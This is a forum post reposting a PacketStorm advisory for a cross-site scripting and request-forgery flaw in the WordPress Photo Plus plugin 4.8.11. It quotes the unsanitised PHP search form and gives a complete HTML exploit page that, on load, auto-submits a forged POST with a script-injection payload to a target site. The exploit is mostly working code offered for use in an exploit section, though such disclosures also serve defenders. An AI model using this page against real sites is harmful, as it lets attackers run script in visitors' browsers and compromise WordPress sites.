Jump to content
Praetorian503

WordPress Photo Plus / Photo Search XSS / CSRF

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

WordPress Photo Plus / Photo Search version 4.8.11 suffers from cross site request forgery and cross site scripting vulnerabilities.

# Exploit Title: Word Press Photo Plus, Photo Search XSS/CSRF Vulnerability
# Google Dork:
# Date: 29/12/12
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Version: 4.8.11
# Tested on: Ubuntu 10.04
Word Press Photo Plus plugin suffers from a XSS/CSRF via Vulnerability in
the "Search Photos" function

Code:
extract from wp-photo-album-plus.php, in widget function
--------------------------------------------------------------------------------------------------------------------------------
 42          <form id="wppa_searchform" action="<?php echo($pagelink) ?>"
method="post" class="widget_search">
 43             <div>
 44                <?php echo $instance['label'] ?>
 45                <input type="text" name="wppa-searchstring" id="wppa_s"
value="<?php echo $wppa[    'searchstring'] ?>" />
 46                <input id = "wppa_searchsubmit" type="submit"
value="<?php _e('Search', 'wppa');     ?>" />
 47             </div>
---------------------------------------------------------------------------------------------------------------------------------
The above code fails to sanitize the $wppa['searchstring'] variable,
allowing attacks to inject harmfull HTML elements and JavaScript code.
Submissions to this form can also be made from any domain, which actually
aids in the exploitation of the vulnerability thus this is classified as a
CSRF Vulnerability

Exploit Code:
The exploit requires an attacker to forge a post request to this form, this
can be done by using the following html page
--------------------------------------------------------------------------------------------------------------------------------
  1 <html>
  2 <body onload="xss()">
  3 <form name="f" id="wppa_searchform" action="http://[domain name]/[photo
search page path]" method="post" class="widget_search">
  4 <input type="text" name="wppa-searchstring" id="wppa_s"
value='"><script>alert(1);</script><textarea>'>
  5 <input name="s" id="wppa_searchsubmit" type="submit" value="Search">
  6 </form>
  7 <script>
  8 function xss(){
  9    document.f.s.click();
 10 }
 11 </script>
 12 <body>
 13 <html>
--------------------------------------------------------------------------------------------------------------------------------
[photo search page path] can be obtained by reading the path set in the
original photo search form attributes
-- 
<Keith k3170makan <http://about.me/k3170makan> Makan/>

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...